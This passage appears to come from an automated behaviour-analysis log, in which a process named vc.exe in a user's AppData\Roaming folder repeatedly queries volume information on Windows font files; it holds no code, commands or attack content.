      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
